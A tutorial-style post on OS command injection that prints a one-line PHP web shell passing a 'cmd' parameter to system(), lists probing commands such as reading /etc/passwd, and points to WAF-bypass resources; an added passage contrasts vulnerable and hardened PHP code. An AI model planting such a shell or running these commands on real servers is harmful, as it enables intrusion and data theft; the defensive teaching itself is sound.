Command injection is a type of web vulnerability that allows attackers to execute arbitrary operating system commands on the server where the application is running.
Command injection vulnerabilities occur when applications pass user-supplied input to shell commands, or to scripts that execute shell commands in the background.
<?php
// Passes the "cmd" query parameter straight to the OS shell and prints the output.
echo system($_GET['cmd']);
?>
I have created the basic PHP shell shown above, with “cmd” as its parameter, named it “shell.php”, and uploaded it to the website to support the examples that follow. In a real-world scenario the PHP shell will already be present on the site. Now that everything is set up, let’s begin.
I have tried some simple commands like “id”, “whoami” and “cat /etc/passwd” to demonstrate. You can run other commands in the same way. In a real-world scenario, if you find a website taking a parameter value of this type, you can try command injection and check whether it is vulnerable or not.



These are some examples of normal command injection. In my case the website doesn’t have any WAF (web application firewall). In simple words, it doesn’t have any kind of filter in place.
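The same class of bug usually appears in ordinary application code rather than in an uploaded shell. The following is an added example, not code from the original post: a hypothetical "ping a host" feature in its vulnerable form beside a hardened form that validates against an allow-list and runs the program without a shell. The function names and sample inputs are constructed for illustration.

```php
<?php
// Added example, not from the original post. Function names are hypothetical.

// VULNERABLE pattern: the request value is concatenated into a string that
// /bin/sh parses, so shell metacharacters in $host become command syntax.
function ping_vulnerable(string $host): string
{
    return (string) shell_exec('ping -c 1 ' . $host);
}

// HARDENED pattern: allow-list validation, then execution without a shell.
function ping_hardened(string $host): string
{
    // Accept only a literal IPv4 address; everything else is rejected outright.
    if (filter_var($host, FILTER_VALIDATE_IP, FILTER_FLAG_IPV4) === false) {
        throw new InvalidArgumentException('host must be an IPv4 address');
    }
    // An array command (PHP >= 7.4) is executed directly, not via a shell:
    // each element is passed to the program as exactly one argument.
    $spec = [1 => ['pipe', 'w'], 2 => ['pipe', 'w']];
    $proc = proc_open(['ping', '-c', '1', $host], $spec, $pipes);
    if (!is_resource($proc)) {
        throw new RuntimeException('could not start ping');
    }
    $out = stream_get_contents($pipes[1]);
    fclose($pipes[1]);
    fclose($pipes[2]);
    proc_close($proc);
    return (string) $out;
}

// Constructed sample inputs: one valid address, two values that must be refused.
foreach (['127.0.0.1', '127.0.0.1; id', 'localhost'] as $input) {
    try {
        $lines = substr_count(ping_hardened($input), "\n");
        echo "accepted: {$input} ({$lines} lines of output)\n";
    } catch (InvalidArgumentException | RuntimeException $e) {
        echo "rejected: {$input} ({$e->getMessage()})\n";
    }
}
```

Because the hardened version never builds a shell command line, it does not depend on a WAF or an input filter catching every metacharacter.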
WAF bypass
To avoid command injection, websites use filters, so you can’t simply execute the commands. To bypass the filters in those cases, we use some methods as shown below.





For further bypass info
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection